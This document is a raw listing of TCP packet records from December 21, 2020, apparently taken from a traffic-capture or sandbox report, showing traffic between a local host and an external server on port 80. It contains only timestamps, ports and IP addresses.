Dec 21, 2020 08:33:21.658092022 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658114910 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.658119917 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658142090 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.658144951 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658169985 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.658176899 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658196926 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.658205986 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658226013 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658245087 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658269882 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658325911 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658335924 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.658353090 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658375978 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.658380985 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658402920 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.658416986 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658432961 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.658453941 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658463955 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.658483028 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658504963 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.658531904 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.659713984 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.662153959 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.662200928 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.662229061 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.662235022 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.662259102 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.662286043 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.663813114 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.663918972 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664128065 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664186001 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664197922 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664227009 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664237976 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664278984 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664284945 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664344072 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664345026 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664402962 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664416075 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664470911 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664478064 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664518118 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664531946 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664554119 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664557934 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664587975 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664613008 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664632082 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664647102 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664673090 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664700031 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664726973 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664803982 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664803982 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664844036 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664869070 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664894104 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664907932 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664947033 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.664959908 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.664997101 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.665004015 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.665062904 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.665970087 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.667318106 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.863856077 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.863914967 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.863962889 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864002943 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864042044 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864082098 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864084959 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.864118099 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.864119053 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864159107 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864197016 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864244938 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864253998 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.864288092 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864289999 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.864326000 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864326954 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.864365101 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.864366055 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864399910 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.864406109 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864423037 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.864450932 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.864459991 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864512920 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.864522934 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.864579916 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.866183996 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866285086 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.866368055 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866427898 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866445065 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.866485119 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866509914 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.866528034 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866555929 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.866578102 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866609097 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.866621017 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866658926 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866663933 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.866698027 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866703987 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.866738081 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866744041 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.866775036 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866780996 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.866813898 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866858959 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.866868019 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.866889000 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866946936 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.866947889 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.866959095 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867007017 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867024899 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867065907 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867086887 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867125988 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867144108 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867185116 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867209911 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867227077 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867255926 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867274046 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867324114 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867341042 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867347956 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867398977 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867455006 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867465019 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867497921 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867511034 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867532015 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867551088 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867578983 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867594004 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867599010 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867640018 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867661953 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867679119 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867691040 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867717981 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867722034 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867754936 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867784023 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867813110 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867892981 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.867892981 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.867949009 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.869244099 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.869282961 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.869329929 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.869339943 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.869349957 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.869370937 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.869404078 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.869411945 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.869437933 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.869474888 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.869492054 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.869519949 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872097015 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872129917 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872158051 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872168064 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872184992 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872225046 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872226000 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872286081 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872313976 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872379065 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872384071 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872412920 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872442007 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872447014 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872463942 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872510910 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872565031 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872606993 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872621059 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872633934 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872648954 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872662067 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872672081 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872689962 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872724056 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872740030 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872760057 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872792006 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872817993 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872819901 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872843027 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872852087 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872875929 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872883081 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872898102 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872910023 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872924089 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872937918 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872951031 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872966051 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.872977018 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.872992992 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873014927 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873019934 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873027086 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873047113 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873070955 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873080015 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873089075 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873121977 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873147964 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873148918 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873173952 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873177052 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873205900 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873224974 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873229980 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873254061 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873292923 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873320103 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873327971 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873348951 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873375893 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873379946 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873400927 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873426914 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873430014 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873456001 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873481989 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873486042 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873507977 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873508930 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873537064 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873541117 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.873557091 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873579025 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.873687029 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.881505013 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.071696043 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.071758032 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.071796894 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.071834087 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.071928024 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072000027 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072000980 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072069883 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072098017 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072108030 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072145939 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072155952 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072197914 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072212934 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072235107 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072268963 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072273016 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072310925 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072324991 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072348118 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072376966 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072385073 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072419882 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072422981 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072458029 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072469950 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072501898 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072511911 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072541952 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072549105 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072585106 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072587013 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072627068 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072655916 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072664976 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072695017 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072726965 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072731972 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072762012 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072768927 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072804928 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072808981 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072841883 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072866917 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072887897 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072896004 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072930098 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072956085 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.072967052 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.072995901 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.073035002 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.073103905 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.073117971 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.073139906 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.073170900 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.073216915 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.075323105 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.075371981 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.075498104 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.075542927 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.075598955 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.075607061 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.075635910 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.075661898 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.075674057 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.075701952 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.075735092 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.075737953 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.075777054 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.075800896 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.075830936 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.075844049 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.075894117 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.075944901 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076004028 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.076025963 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076092958 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.076169014 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.076314926 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076378107 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076415062 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076452017 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076486111 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.076491117 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076527119 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076564074 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076575994 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:22.076608896 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:22.076642990 CET	49167	80	192.168.2.22	103.141.138.119
